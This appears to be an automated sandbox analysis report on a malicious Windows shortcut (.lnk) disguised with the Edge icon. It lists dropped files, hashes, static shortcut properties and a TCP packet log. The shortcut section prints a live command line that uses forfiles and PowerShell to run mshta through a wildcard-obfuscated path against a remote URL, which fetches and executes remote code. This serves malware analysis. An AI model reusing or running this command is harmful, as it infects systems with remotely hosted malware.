                                                                                                                                                                                                      SHA-512:47CF04B377C4D5D512EE93439D17D21F6E0C5011E3CDC9EBE2835C91B6BFE7D5B3E4E23DD8C00017D7B235D08A8524A103EDF3A199C8B1D5CB9A182D8D5EAE73
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\switcher[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):8973
                                                                                                                                                                                                      Entropy (8bit):4.788833439160095
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:DFvmFAXkH9W3hMZ6EhtbdtjmGMD/stn9iW:DFOuN4qW
                                                                                                                                                                                                      MD5:1AAC01C7120691B8BA37ACD1C67B89F7
                                                                                                                                                                                                      SHA1:36BAC4F362EB3B24BFAD500E5AA98DDF61A6BCB5
                                                                                                                                                                                                      SHA-256:687A6513B3D91EEA53EC2CA5F6431EE6C8BEB7E6AE53D9259DE7673DE1C7D6C9
                                                                                                                                                                                                      SHA-512:C0154A08498EE2AD1DAB67837DF2E49176FE8ACC3294309B7B5E15402873D628F0CA8D54E9D36A95A20E84D3B20A383AAC3726EEBDCB15B505CDF77FCE1200F1
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview::root {. --woof-sd-ie-sw_vertex_enabled_bg_color: #79b8ff;. --woof-sd-ie-sw_vertex_enabled_bg_image: url();. --woof-sd-ie-sw_vertex_enabled_border_color: #79b8ff;. --woof-sd-ie-sw_vertex_enabled_border_style: solid;.. --woof-sd-ie-sw_vertex_disabled_bg_color: #ffffff;. --woof-sd-ie-sw_vertex_disabled_bg_image: url();. --woof-sd-ie-sw_vertex_disabled_border_color: #ffffff;. --woof-sd-ie-sw_vertex_disabled_border_style: solid;.. --woof-sd-ie-sw_vertex_border_width: 1px;.. --woof-sd-ie-sw_substrate_enabled_bg_color: #c8e1ff;. --woof-sd-ie-sw_substrate_enabled_bg_image: url();. --woof-sd-ie-sw_substrate_enabled_border_color: #c8e1ff;. --woof-sd-ie-sw_substrate_enabled_border_style: solid;.. --woof-sd-ie-sw_substrate_disabled_bg_color: #9a9999;. --woof-sd-ie-sw_substrate_disabled_bg_image: url();. --woof-sd-ie-sw_substrate_disabled_border_color: #9a9999;. --woof-sd-ie-sw_substrate_disabled_border_style: solid;.. --woof-sd-ie-sw_substrate

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\switcher[2].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4289
                                                                                                                                                                                                      Entropy (8bit):4.919735429341782
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:mptBqnBQDHR3/9GmQrtgc18cDvYQmltSuJWyW51V:ceBERv9jQuc18VQmmua51V
                                                                                                                                                                                                      MD5:1EBDDED2CCEB731FD3C112FD866A4A1C
                                                                                                                                                                                                      SHA1:EABA5B3711A25AA78D79413D9E6EC915487FCE4A
                                                                                                                                                                                                      SHA-256:5A5F1B12C22B8E6462AE9822CBD42E2640F4E8ED8B9382DB6BFFA1C876DA347B
                                                                                                                                                                                                      SHA-512:888386F361F37B730B74EEC6E3360C3773BA9D8101C0BA3FAFA2B071565BF559C38A0BBB0C3A7073C62DB9ACFA80EEDC79E3D41B117A8BFA7EF58D8C2237E469
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview::root {.. --woof-sd-ie-vertex_enabled_bg_color: #79b8ff;.. --woof-sd-ie-substrate_enabled_bg_color: #c8e1ff;.. --woof-sd-ie-vertex_disabled_bg_color: #ffffff;.. --woof-sd-ie-substrate_disabled_bg_color: #9a9999;.. --woof-sd-ie-vertex_size: 20px;.. --woof-sd-ie-vertex_border_radius: 50%;.. --woof-sd-ie-vertex_top: 0;.. --woof-sd-ie-substrate_width: 34px;.. --woof-sd-ie-substrate_height: 14px;.. --woof-sd-ie-substrate_border_radius: 8px;.. --woof-sd-ie-label_font_color: #333333;.. --woof-sd-ie-label_font_size: 16px;.. --woof-sd-ie-label_left: 15px;.. --woof-sd-ie-label_top: -18px;..}....label.switcher23-toggle {.. position: relative;.. display: inline-block;.. width: auto;.. height: auto;.. cursor: pointer;.. -webkit-tap-highlight-color: transparent;.. transform: translate3d(0, 0, 0);.. padding: 0 !important;..}...switcher23-toggle:before {.. content: "";.. position: relative;.. top: 3px;.. left: 3px;.. widt

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\warning[1]

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:GIF image data, version 89a, 36 x 38
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1062
                                                                                                                                                                                                      Entropy (8bit):4.517838839626174
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
                                                                                                                                                                                                      MD5:124A9E7B6976F7570134B7034EE28D2B
                                                                                                                                                                                                      SHA1:E889BFC2A2E57491016B05DB966FC6297A174F55
                                                                                                                                                                                                      SHA-256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
                                                                                                                                                                                                      SHA-512:EA1B3CC56BD41FC534AAC00F186180345CB2C06705B57C88C8A6953E6CE8B9A2E3809DDB01DAAC66FA9C424D517D2D14FA45FBEF9D74FEF8A809B71550C7C145
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:GIF89a$.&.......h...............h.hh..h..h..h..h....h................h.................h.................h................hh.h..h..h..h..h.hhhhh.hh.hh.hh.hh..hh.h..h..h.h..h..hh.h..h..h..h..h..hh.h..h..h..h..h..hh.h..h..h..h..h...h...............h.hh..h..h..h..h....h...............h................h...........h.................h...............h.hh..h..h..h..h....h................h.................h.................h.................h..............h.hh.h..h..h..h....h..............h................h................h................h...............h.hh..h..h..h..h....h................h.................h.................h......................................................................................................................................!.......,....$.&.@......H.......<0.....VXQH..C..1>.(..@..C.t.q"B..S.\.r.D...Z.. .M.41.".......<.r.;.r4..P..]....+.T-...N...x....1.:..TdD...^.j..W.r...y....V...Lx0..):8p q.4.;...f`.r-K...(..P....t.].~..l..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                      Entropy (8bit):0.773832331134527
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:NlllulD/:NllUD
                                                                                                                                                                                                      MD5:D9ADDC8BC71EE61261940D67A7EFF73A
                                                                                                                                                                                                      SHA1:44DABE2479B4D251FC348A7198B3F5665BC48F5C
                                                                                                                                                                                                      SHA-256:3945C70445A1C3E3E162F1EE5EBBD03C93D3D4483316AE2AF1D9C025D0B204A7
                                                                                                                                                                                                      SHA-512:87100FEF4AB233A92DD99E02668390D1C546DEB0DB9E1E7C470E1AC9D63A36C64081E31262786128526FF2FE223E883DBF338587A55A961F6CB7C38A419967AE
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:@...e.................................R.........................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hv2y4nhz.won.psm1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_relhfqw2.1yu.ps1

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Sat May 7 04:20:19 2022, mtime=Wed Oct 16 07:57:53 2024, atime=Sat May 7 04:20:19 2022, length=41472, window=hidenormalshowminimized
                                                                                                                                                                                                      Entropy (8bit):1.9798856438467354
                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                      • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                      File name:sbOq2d6k2t.lnk
                                                                                                                                                                                                      File size:4'071 bytes
                                                                                                                                                                                                      MD5:39cf9750a6ddd099525b05015a61078b
                                                                                                                                                                                                      SHA1:62baca21ff6d14e887b1a6ba5a247e01a3836664
                                                                                                                                                                                                      SHA256:806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68
                                                                                                                                                                                                      SHA512:feb24f082e21f6f2c0d96e5a529748896f25a7132daa1ff2ee652a75e346b241a6273ea277be1d6da6940d88fb0ad4cafa69adedb5a72869e0e875d1cfe4aa01
                                                                                                                                                                                                      SSDEEP:24:8WTCPtKuiezcHJBkr+/4mdSL/Yb2SlPdd79ds8JermllSoHmQ:8W685JEwKYdJ9veSljHL
                                                                                                                                                                                                      TLSH:0681DF0127E50B29F3F34A7594BAF726467BB85ADD22CF1F415002845C61601DA78FAF
                                                                                                                                                                                                      File Content Preview:L..................F.@.. .....s$.a..T..|......s$.a..........................E....P.O. .:i.....+00.../C:\...................V.1.....JY.q..Windows.@........T,*PYlD..........................)...W.i.n.d.o.w.s.....Z.1.....PY.F0.System32..B........T,*PY.F....B.

                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                      Icon Hash:74f4f4dcece9e9ed

                                                                                                                                                                                                      Static Windows Shortcut Info

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Relative Path:..\..\..\Windows\System32\forfiles.exe
                                                                                                                                                                                                      Command Line Argument:/p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.383708954 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.383723974 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.383814096 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.398575068 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:05.398603916 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.810941935 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.811053991 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.877800941 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.877830982 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.878809929 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.878931999 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.881525993 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:06.923371077 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591103077 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591162920 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591207027 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591245890 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591274977 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591294050 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591310024 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.591356039 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.695276976 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.695296049 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.695410013 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.697253942 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.697274923 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.706789970 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.706841946 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.706965923 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.706971884 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.706989050 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.707060099 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.822840929 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.822889090 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.823045015 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.823060036 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.823163033 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.938460112 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.938477993 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.938565016 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.938582897 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:07.938627958 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.054893970 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.054953098 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.054986000 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055000067 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055051088 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055051088 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055494070 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055531025 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055594921 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055594921 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055605888 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055681944 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055743933 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055916071 CET49704443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.055924892 CET44349704185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.056555986 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.056591034 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.056695938 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.057013035 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.057034016 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.589760065 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.589837074 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.590646982 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.590656996 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.590894938 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.590902090 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.867156029 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.867221117 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.867436886 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.869061947 CET49705443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.869090080 CET44349705185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.869828939 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.869844913 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.869981050 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.870158911 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.870170116 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.954705954 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.954916954 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.955276012 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.955286980 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.955493927 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:08.955498934 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.230704069 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.230761051 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.230777979 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.230802059 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.230870008 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.230895996 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.231185913 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.231245995 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.232139111 CET49706443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.232155085 CET44349706185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.232673883 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.232709885 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.232916117 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.233010054 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.233021975 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.771940947 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.772075891 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.772876024 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.772883892 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.773114920 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:09.773124933 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.126312971 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.126487017 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.163014889 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.163039923 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.163357019 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.163393021 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186487913 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186515093 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186604977 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186616898 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186688900 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186701059 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186707973 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.186781883 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.305042028 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.305135965 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.305219889 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.305249929 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.368256092 CET49707443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.368274927 CET44349707185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.387368917 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.387386084 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.387473106 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.387909889 CET49709443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.387933969 CET44349709185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.439038038 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.439102888 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.439270020 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.439270973 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.439270973 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.439337969 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.496077061 CET49708443192.168.2.5185.68.16.189
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.496097088 CET44349708185.68.16.189192.168.2.5
                                                                                                                                                                                                      Oct 27, 2024 07:35:10.499258041 CET49710443192.168.2.5185.68.16.189
